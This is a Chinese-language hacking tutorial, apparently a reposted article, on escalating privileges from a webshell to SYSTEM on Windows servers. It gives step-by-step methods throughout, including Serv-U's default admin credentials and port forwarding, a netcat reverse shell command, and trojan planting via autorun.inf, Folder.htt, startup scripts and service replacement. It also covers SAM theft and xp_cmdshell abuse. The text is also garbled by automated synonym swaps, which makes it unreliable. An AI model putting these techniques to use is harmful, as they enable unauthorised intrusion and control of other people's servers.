服务器 提权办法大全脚本之家wangyi - 乐橙lc8

服务器 提权办法大全脚本之家wangyi

2019-02-07 11:38:48 | 作者: 昊磊 | 标签: 办法,目录,办理 | 浏览: 1298

现在能够说网络办理员对效劳器的设置是越来越BT,但BT的一同,也有黑客朋友们对效劳器的不断的测验,在测验中往往获取最低的guest权限是简略的,像咱们在侵略网站过程中,获取webshell是简略的,可是当由webshell的guest权限向system权限提高时却往往是止步不前。所以我有想写这样一篇文章的主意,可是在考虑的过程中,又不得不供认,办法是不断的探究中出来的,办法更是有惯例的也有另辟蹊径的。下面就做一些简略的介绍,对提权的办法进行一些介绍,一同也期望在更多朋友的不断回复中能够丰厚咱们的办法。
首要要阐明的是,过早的一些缝隙咱们就不再多说了,只说一些现在能够见到的吧。还有就是本文的标题是webshell下的效劳器提权办法。
下面咱们就进入主题,对webshell的提权办法!
首要咱们要清晰的是,提权一般是依托主机所注册的效劳,运用效劳存在的缝隙和办理员设置的忽略进行提权的,不过也不扫除一些SB的办理员对效劳器设置的好像没有"穿衣服".下面就是针对一些常见的效劳进行的提权办法。
在获取webshell后,咱们常见的是看一下体系的效劳,检查效劳能够经过运用扫描器对效劳器ip进行扫描,或是在webshell中有履行dos指令时检查net start来检查主机所敞开的效劳。首要咱们说一下从简略的开端说起:
1。pcanywhere的提权办法
pcanywhere软件我想咱们都了解,为什么将它放在首位就是由于读取暗码后直接衔接就能够了,假如对方主机在注册了pcanywhere的效劳端的话,咱们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,假如行那就最好了,直接下载它的CIF文件,然后运用pcanywhere的暗码读取器得到pcAnywhere暗码,然后运用pcanywhere登陆即可!接下来就是可视化操作了。
2。Serv-U提权办法
Serv-u能够说是网络上比较火的一款FTP效劳器软件,有许多像我这样的小黑们都是看体系效劳中是否有Serv-u的体系进程来进行提权的。Serv-u的提权办法针对不同的版别也有不同的办法,这儿咱们就罗列一二,或许不是很全,但在其他网友的回复中能够不断的弥补吧!
a.serv-U本地提权:serv-U本地提权一般是运用溢出程序对serv-u的设置上的缺点进行增加超级账户的成效。例如Xiaolu写的serv-u.exe就是运用sevr-u的默许办理端口,办理员账号和暗码进行提权的,默许本地办理端口是:43958,默许办理员:LocalAdministrator,默许暗码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,能够以Guest权限来进行衔接,对Serv-u进行办理,运用本地提权的要害就是寻觅效劳器文件目录中的everyone权限目录,下面我给咱们罗列些常见的everyone权限目录:
c:\winnt\system32\inetsrv\data\
是erveryone 彻底操控,许多时分没作约束,把提高权限的东西上传上去,然后履行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\Documents\
许多时分data目录不可,试试这个许多主机都是erveryone 彻底操控!
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(假如效劳器支撑PHP)
c:\PHP(假如效劳器支撑PHP)
上面一些目录就是常见的,不过也不扫除一些特别的,像江民的kv2004对文件夹的权限设置就不是很严厉的。
不过针对本地提权是能够防备的,下面是我在xiaolu的文章中节选的:
避免办法和对策:
一般避免办法:设置目录权限,经过去掉Web目录iusr用户的履行权限来避免运用Webshell来运转Exp程序。
对策:这种办法有必定的局限性,需求设置的目录许多,不能有一点遗漏,比方我就发现许多虚拟主机在C:\Documents and Settings\All Users\ Documents目录以及下边几个子目录Documents没有设置权限,导致能够在这个目录上传并运转Exp,这种目录还有x:\php,x:\perl等,由于这种目录都是everyone彻底操控的。有些主机还支撑php,pl,aspx等,这简直就是效劳器的Serv-U灾祸,^_^,运转程序愈加便利。
高档一点的避免办法:修正Serv-u办理端口,用Ultraedit翻开ServUDaemon.exe查找B6AB(43958的16进制),替换成自己界说的端口比方3930(12345),翻开ServUAdmin.exe找到最终一个B6AB替换成3930(12345),发动Serv-u,现在本地办理端口就成了12345了:
TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING
对策:抵挡这种也很简略,netstat –an,就能看到端口了,有人说netstat无法运转,其实你再上传个netstat.exe到可履行目录运转就ok了,然后修正一下Exp编译,上传运转就好了,我修正了一个能够自界说端口的Exp,运转格局:
USAGE: serv-u.exe port "command"
Example: serv-u.exe 43958 "net user xl xiaoxue /add"
更高档的避免办法:修正办理员名和暗码,用Ultraedit翻开ServUDaemon.exe查找Ascii:LocalAdministrator,和#l@$ak#.lk;0@P,修正成等长度的其它字符就能够了,ServUAdmin.exe也相同处理。
对策:这下默许的办理员衔接不上了,还有办法么?嘿嘿,有的办理员装置Serv-u都是运用默许目录C:\Program Files\Serv-U装置,这个目录尽管不能写,也不能修正,可是默许iusr是能够读的,咱们能够用webshell来下载ServUDaemon.exe,用Ultraedit翻开剖析一下,Serv-U的帐号暗码就到手了,修正Exp编译上传运转,咱们又成功了。
终极防护:
a.设置好目录权限,不要忽略大意;
b.Serv-U最好不要运用默许装置途径,设置Serv-U目录的权限,只要办理员才干拜访;
c.用我介绍的办法修正Serv-U的默许办理员姓名和暗码,喜爱的话端口也能够改掉。
d.serv-U办理端口定向转发法:这儿需求运用的东西是FPipe.exe
咱们要知道Serv-u默许本地办理端口是:43958,这个是只允许本地ip127.0.0.1进行登陆和办理的,那么咱们就想能不能经过端口转历来长途办理呢?所以咱们用到FPipe.exe,首要是将FPipe.exe上传至效劳器中,然后再cmd下履行
Fpipe.exe -v -l 12345-r 43958 127.0.0.1
这儿要阐明的是,这段字符的意思是当拜访12345端口时就会主动转向43958端口,也就是serv-u的办理端口
所以咱们在本地装置一个Serv-u,
新建一个效劳器,填入对方IP,
user:
LocalAdministrator
pass:
#l@$ak#.lk;0@P
衔接上后你就能够办理他的Serv-u了,剩余的操作就是履行上面说到的办法了!
=
Serv-U的办法我就总结出这几个来,或许还有其他的办法我没有看到吧
不过个人以为要害仍是本地溢出缝隙的运用要比较多一些,所以网上也常常呈现serv-u的本机溢出程序
不同版别的更是层出不穷,前一段时间针对serv-u6.0.2的修正了默许办理员账号和暗码的相关文章还请咱们参照学校黑客联盟的小鱼修炼中的文章。
Serv-U的提权文章就暂时先总结到这儿,有更好的办法还请咱们回复!

3.Autorun办法:这种办法也能够说是比较陈旧的办法,开端应该是从光盘主动播放中寻觅到的创意吧?不进行细说,给出格局即可
制造一个Autoruan.inf文件.内容如下
[AutoRun]
open=bear.exe
bear.exe为木马程序,与autorun.inf放在同一目录下!

4。SAM破解办法: 进入C:\WINNT\system32\config\ 下载他的SAM文件用lc等破解东西破解。

5。相关脚本提权办法:前面的serv-u的ftp提权中提过的vbs这儿再说下.进入c:\Documents and Settings\All Users\「开端」菜单\程序\发动 写入bat或vbs文件。这种办法也是归于刻舟求剑类的,只要在对方主机重起今后才干够到达意图。

6。NC的反弹提权:这儿就要说NC的相关用法了,假如在对方效劳器中有满足的权限履行nc的话就好了,把它反弹到自己的电脑上,你就能够进行相关操作了!瑞士军刀具体办法不多说,给出格局,如下:
server:nc -e cmd.exe ip 1234
client: nc -l -p 1234

7。conn等asp文件中走漏SQL帐户暗码办法:这种办法说起来应该算是比较幸运的办法。从前马俊和我说过一次,本来没有太介意,现在还真的感觉有些好用了,找到账号暗码和数据库名在对方没有删去xp_cmdshell条件下用sql衔接东西衔接即可,衔接上后就能够输入你想要的CMD指令了。

8。VNC的相关提权:VNC也是一个相似pcanywhere的长途办理软件,在linux运用广泛,从前在看台湾的一些效劳器中有许多运用VNC的,办法也是我在网络中学到的,不过在运用中就成功过一次,比较抑郁!办法就转载一下吧,网址:https://www.hxhack.org/Article/HTML/14184.html
还有要弥补的就是vnc是能够反向衔接的,这个办法我没有试过,仅仅从前看影子做过一个视频动画。

9。desktop.ini与Folder.htt办法。(此办法是在网络看到的)办法如下:首要树立一个文件夹,进入,在空白处点右键,挑选“自界说文件夹”一直下点,默许即可。完成后,你就会看到在此目录下多了两个名为Folder
setting的文件架与desktop.ini的文件,假如看不到,就把显现一切文件给选上,然后咱们在Folder setting目录下找到Folder.htt文件,记事本翻开,在恣意当地参加以下代码:<OBJECT ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木马名”></OBJECT> 然后你将你的木马文件放在Folder setting目录下,把此目录与desktop.ini一同上传到对方恣意一个目录下,就能够了,只要等办理员阅读了此目录,它就履行了咱们的木马,此办法也归于相似autorun的刻舟求剑办法。

10。替换效劳提权:我以为比较复杂,不过有些时分也有用,首要是看效劳进程,在看咱们是否有履行指令的权限,这儿要用到的指令是rename,相关用法:
C:\>rename /?
重命名文件。
RENAME [drive:][path]filename1 filename2.
REN [drive:][path]filename1 filename2.
例如替换c:\kv2004\kv.exe的进程
rename c:\kv2004\kv.exe bear.exe
然后再将咱们的本地木马文件命名为kv.exe上传到c:\kv2004\目录下,等候对方从头起动机算机即可!
版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表乐橙lc8立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章